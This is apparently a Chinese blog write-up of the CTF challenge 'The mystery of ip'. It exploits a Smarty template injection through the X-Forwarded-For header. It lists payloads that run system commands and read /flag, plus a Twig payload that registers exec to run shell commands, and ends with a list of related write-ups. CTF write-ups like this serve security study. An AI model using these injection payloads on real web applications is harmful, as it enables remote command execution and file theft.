[BJDCTF2020]The mystery of ip

最新推荐文章于 2024-09-29 16:52:52 发布

原创最新推荐文章于 2024-09-29 16:52:52 发布 · 157 阅读

0 ·

CC 4.0 BY-SA版权

CTF刷题专栏收录该内容

19 篇文章

订阅专栏

本文深入探讨了模板注入漏洞，以Smarty和Twig为例，展示了如何利用注入payload进行系统操作，如`{ifphpinfo()}

在这里插入图片描述
看到IP立马就想到了XFF

测试了一下，存在模板注入。是smarty注入。

Twig
{{7*‘7’}} #输出49
Jinja
{{7*‘7’}} #输出7777777

smarty注入payload
{if phpinfo()}{/if}
{if system(‘ls’)}{/if}
{ readfile(’/flag’) }
{if show_source(’/flag’)}{/if}
{if system(‘cat flag’)}{/if}
在这里插入图片描述

最终的到flag
在这里插入图片描述
Twig注入payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}  //将id换为cat /flag即可

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

2021！

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

BJDCTF-writeup

夏日の blog

03-23

1992

本篇文章为个人做题时的部分wp，如有错误，请联系我更正。目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ng总结杂项最简单的misc-y1ng 题目是一个zip包，尝试解压出错，用AZR压缩包修复工具修复后，解压得到一个secret文件，由于没有后缀名，放入010editor查看，发现含有IHDR ...

buuctf-[BJDCTF2020]The mystery of ip

qq_42728977的博客

12-23

1589

[BJDCTF2020]The mystery of ip考点复现参考考点模板注入复现看到提示，说是怎么知道我的ip，那就说明应该是该请求头，然后模板注入，然后发现果然是。在请求头加入X-Forwarded-For: GET /flag.php HTTP/1.1 Host: node4.buuoj.cn:28006 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 A

参与评论您还未登录，请先登录后发表或查看评论

2020-BJDCTF

unexpectedthing的博客

03-08

2281

文章目录Mark loves cat考点wp方法1方法2Cookie is so stable考点：Twig模板注入wpThe mystery of ip考点：wpsmarty的模板学习对模板注入的判别EasySearch考点EzPHP考点wp1.主页2. 绕过$_SERVER['QUERY_STRING']3.绕过preg_match常见绕过preg_match的方法4.绕过$_REQUEST的字母匹配$_REQUEST的一些小特性$_REQUEST使用不当绕过WAF漏洞代码$_REQUEST导致的HPP

BJDCTF_ one_gadget

weixin_44864859的博客

04-09

422

考察点：one_gadget 题目给出了 printf 的地址，由此可算得 libc 基址，然后找 one_gadget、计算 libc 中 one_gadget 地址 printf("Give me your one gadget:"); __isoc99_scanf("%ld", &v4); v5 = v4; v4(); v4 是个函数指针，scanf 的时候把 on...

BJDCTF2020

Nobug_的博客

09-06

750

[BJDCTF2020]藏藏藏打开题目后发现直接打开下面的jpg文件出现一个二维码扫码得flag{you are the best!} [BJDCTF2020]鸡你太美可以发现打开压缩包里面有两张gif图片但是第一个gif图片打不开我们把它拖到010Editor 去查看我们可以发现第二个gif图片没有文件头我们把GIF的文件头补齐就可以拿到flag 47 49 46 38 添加过文件头之后就可以查看图片 flag{zhi_yin_you_are_beautiful} [BJD

【BUUCTF】[BJDCTF2020]The mystery of ip

aoao331198的博客

04-23

469

X-Forwarded-For 看到题目，要首先想到这个 BP在http头里面增加X-Forwarded-For，发现是可控的，可能存在模板注入让X-Forwarded-For={{7*7}} 接下来常规思路注入命令 X-Forwarded-For={{system("cat /flag")}} 过程没什么好说的，贴一下源码 <?php require_once('header.php'); require_once('./libs/Smarty.class.php'); $

[BJDCTF2020]The mystery of ip（ssti模板注入题目）

m0_55109452的博客

06-02

2086

项目场景：链接http://node3.buuoj.cn:29669/index.php 问题描述：观察页面找到三个链接，点开flag和hint看看，发现flag那个页面窃取了客户端的ip地址，这题的题目是“The mystery of ip”IP的神秘，看来解题是要从这里入手了。尝试解决：既然是窃取了IP，考虑是不是XFF或Client-IP这两个header，发现这个IP确实可控，0.0，感觉可以冲了我想到的第一个就是之前看到的sql注入的http头注入，但是也只是想想罢了，再看看其他方

smarty模版 [BJDCTF2020]The mystery of ip 1

m0_75178803的博客

12-06

764

本来联想到XFF漏洞引起的sql注入，但是我们无论输入什么都会正常回显，就联想到ssti注入。我们看到smarty_internal_templatecompilerbase.php。可以看到用的是smarty，Smarty 是一个用于 PHP 的模板引擎。点击hint，查看源代码处告诉了我们要利用这个ip。bp抓包，并添加X-Forward-For头。点击flag给了我们一个ip。{config}来看看配置。

[bjdctf2020]the mystery of ip

03-16

这是一道关于IP地址的谜题，需要我们了解IP地址的基本知识和相关的网络协议。通过分析题目中给出的IP地址和端口号，我们可以推测出这是一道关于TCP/IP协议的题目。我们需要使用Wireshark等网络抓包工具来捕获网络...

BJDCTF2nd

Amherstieae的博客

05-25

1459

本文写于3.24，只是那个时候还莫得博客，遂现在才发出。写在前面大家好呀，这里是β-AS，是一枚真的小菜鸡，希望路过的师傅带带我鸭这是第二届BJDCTF，作为真弟弟只对crypto和misc感兴趣呀，然后接着是关于这两方面这次比赛我们做出来的题的writeup,希望能对大家有所帮助，也希望路过的大佬带带我（这是关键）哦对了，七校联盟萌新赛？？？？嗯？？？？？？出题人出来！线下1V1来不来！！（假的，我打不过你） CRYPTO 。1签到-y1ng QkpEe1czbGMwbWVfVDBfQkpEQ

BJDCTF_2nd PWN复盘

weixin_44145820的博客

03-26

868

目录r2t3one_gadgetydsneedgirlfriend2r2t4 r2t3 在name_check函数中有一个strcpy，看起来是溢出的机会，但是前面判断了长度，这里在汇编下才能发现漏洞即只要长度超过255就会溢出 Exp: from pwn import * r = remote("node3.buuoj.cn", 29302) elf = ELF("./BJDCTF_2...

【CTF】bjdctf_2020_babystack 1

凉水的博客

01-21

1646

解题思路: 1 先反编译： undefined8 main(void) { undefined local_18 [12]; uint local_c; setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); local_c = 0; puts("**********************************"); puts("* Welcome to the BJDCTF! *

[BJDCTF2020]伏羲六十四卦

最新发布

hengdonghui的博客

09-29

2455

运行的结果中一共有i_k_max组解（i_k_max的值是多少，就会有多少组解，我们可以随意设定i_k_max的值），为了使程序简洁、易读，可以自定义一个函数：try_a()，在主函数中循环调用try_a().我们自己可以随意设定a的最大值，刚开始编程的时候，我设定的是100。# i_k_max = 27 冗余一组解。第100组解跟第22组解是一样的。第98组解跟第20组解是一样的。第99组解跟第21组解是一样的。第27组解跟第1组解是一样的。第28组解跟第2组解是一样的。第29组解跟第3组解是一样的。

buuctf [BJDCTF 2nd]ydsneedgirlfriend2

weixin_45677731的博客

08-13

280

[BJDCTF 2nd]ydsneedgirlfriend2 一道有手就行的堆题这道题目的实现过程非常简单易懂，最后的脚本也非常简洁，适合我这样的萌新。 64位程序，拖进ida，看几个主要函数 add函数：注意，如果bss段的0x6020a0这里没有内容的话，程序会先申请一个0x10的chunk，用于存放接下来为用户申请的chunk的地址和print girlfriend name函数的地址，可以看到这个函数用处就是输出内容，同时，这个chunk本身的地址会被放在0x6020a0处接下来，用户输

BJDCTF2020CRYPTO

ZBDX2113的博客

05-07

1638

这次做一些简单题，巩固一下基础首先是ctfshow内部赛密码2 全文只给出了ctf和show两个单词，不是什么特殊字符，也不属于特殊解密，类似于这样的，可以想到摩斯密码，它是由-与.组成的，试着用ctf作.，show作-，敲完前四行编码，转换之后为flag，所以挨个敲就好了。 BJDCTF2020签到题这种题目一般是归纳总结，仅有小写字母与数字组成的密文，我们可以想到MD5，hex，键盘密码等等，这道题使用的是hex编码，直接带入网站就好。 BJDCTF2020编码与调制这

BJDCTF 2nd--圣火昭昭-y1ng

qq_42016346的博客

03-22

2074

仔细审题,有key那么应该是加密隐写了,还有一个加重的猜字,很容易联想到outguess(猜的英文) 下载附件得到压缩包,照常16进制头尾.分离,无果后再解压得到张喵喵喵的图片,照常属性.16进制.分离(还有啥好的习惯请师傅赐教呀) 在属性得到按照题目的提示去掉com得到 gemlove ok直接outguess解密 flag,GET!!(祖安出题人) ...

第二届BJDCTF-MISC

Alita_lxz的博客

03-24

791

题目来源：https://buuoj.cn/challenges 第一题将压缩包下载下来，解压之后是一个无后缀的文件，放入HxD中，看到是PNG的文件头，少了一部分让我们加上去保存，加上后缀.png 打开，会有一张图片，我们翻转一下是一串16进制字符串424A447B79316E677A756973687561697D，我们将其转换成字符 BJD{y1ngzuishuai} 第二题...

1.BJDCTF(2020第二届)——Crypto加密题

qwsn

04-01

3076

0x01.题目统计 0x02.Crypto复现第一题：[BJDCTF 2nd]签到-y1ng （1）密文：QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ== （2）base64解码得到：BJD{W3lc0me_T0_BJDCTF} （3）flag：BJD{W3lc0me_T0_BJDCTF} 第二题：[BJDCTF 2nd]老文盲了（1）密文：罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛...